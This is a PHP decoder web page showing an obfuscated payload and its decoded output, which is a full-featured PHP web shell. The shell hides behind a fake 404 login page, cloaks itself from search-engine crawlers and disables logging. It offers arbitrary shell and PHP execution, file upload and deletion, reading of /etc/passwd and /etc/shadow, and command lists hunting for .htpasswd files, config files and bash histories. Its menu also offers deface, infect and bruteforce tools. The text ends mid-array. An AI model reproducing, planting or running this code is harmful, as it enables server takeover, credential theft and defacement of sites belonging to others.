Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval (gzinflate(base64_decode(str_rot13("7s1eq9b60jNZs27K6a9jiKAsWehRpRwnUWd0PLRRzvB..
Decoded Output download
$auth_pass = "4d1f35512954cb227b25bbd92e15bc7b";
$color = "#00ff00";
$sec = 1;
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION' , '2.6.5 by md. l07hdh');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
@chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';
if($os == 'win')
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
function printHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = "UTF-8";
global $color;
?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found<?=VERSION?></title>
<style>
body {background-color:#000;color:#fff;}
body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
span,h1,a { color:<?=$color?> !important; }
span { font-weight: bolder; }
h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
div.content { padding: 5px;margin-left:5px;}
a { text-decoration:none; }
a:hover { background:#ff0000; }
.ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px; }
input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 80%; }
.main th {text-align:left;}
.main tr:hover{background-color:#5e5e5e;}
.main td, th{vertical-align:middle;}
pre {font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
function set(a,c,p1,p2,p3,p4,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(p4 != null)document.mf.p4.value=p4;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function da2(a,c,p1,p2,p3,p4,charset) {
set(a,c,p1,p2,p3,p4,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr('<?=$_SERVER['REQUEST_URI'];?>', params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\d+)([\S\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=p4 value='<?=isset($_POST['p4'])?htmlspecialchars($_POST['p4']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$millink='http://www.exploit-db.com/search/?action=search&filter_description=';
// fixme
$millink2='http://www.1337day.com/search';
if( strpos('Linux', $kernel) !== false )
$millink .= urlencode( '' . substr($release,0,6) );
else
$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0;$j<=$i;$j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Test','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');
if(!empty($GLOBALS['auth_pass']))
$m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach($m as $k => $v)
$menu .= '<th width="'.(int)(1/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach( range('a','z') as $drive )
if (is_dir($drive.':\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
'<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[exploit-db]</a> <a href="'.$millink2.'" target=_blank>[1337day]</a>
Download : <a href="http://www.google.com" target=_blank>[SideKick1]</a>
<a href="http://www.google.com" target=_blank>[SideKick2]</a>
</nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' ) <span>Usefull Locals:</span> '.rootxpL().' <br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
'<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}
function printFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
<tr>
<td><form onSubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
<td><form onSubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
</tr>
<tr>
<td><form onSubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
<td><form onSubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
</tr>
<tr>
<td><form onSubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
</tr>
</table>
</div>
</body></html>
<?php
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("
",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function viewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
elseif (!@is_writable($f))
return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
else
return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
function actionSecInfo() {
printHeader();
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '<span>'.$n.': </span>';
if(strpos($v, "
") === false)
echo $v.'<br>';
else
echo '<pre class=ml1>'.$v.'</pre>';
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if(function_exists('apache_get_modules'))
showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if( $GLOBALS['os'] == 'nix' ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
echo '<br>';
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Downloaders', implode(', ',$temp));
echo '<br/>';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings',ex('net accounts'));
showSecParam('User Accounts',ex('net user'));
}
echo '</div>';
printFooter();
}
function actionPhp() {
if( isset($_POST['ajax']) ) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"
\'")."';
";
echo strlen($temp), "
", $temp;
exit;
}
printHeader();
if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
echo '<h1>PHP info</h1><div class=content>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU','',$tmp);
$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
$tmp = preg_replace('!h1!msiU','h2',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
echo $tmp;
echo '</div><br>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '<h1>Execution PHP-code</h1> example : echo file_get_contents(`/etc/passwd`); <div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '</pre></div>';
printFooter();
}
function actionFilesMan() {
printHeader();
echo '<h1>File manager</h1><div class=content>';
if(isset($_POST['p1'])) {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload file!";
break;
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
} elseif($_SESSION['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
?>
<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == 'checkbox')
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach($files as $f) {
echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
$l = $l?0:1;
}
?>
<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
</form></table></div>
<?php
printFooter();
}
function actionStringTools() {
if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13(base64_decode($p)))));}}
if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode(str_rot13($p)))));}}
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
if(function_exists($_POST['p1']))
echo $_POST['p1']($_POST['p2']);
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"
\'")."';
";
echo strlen($temp), "
", $temp;
exit;
}
printHeader();
echo '<h1>String conversions</h1><div class=content>';
$stringTools = array(
'nested ROT13_base64' => 'ROT13_base64_decode',
'nested base64_ROT13' => 'base64_ROT13_decode',
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
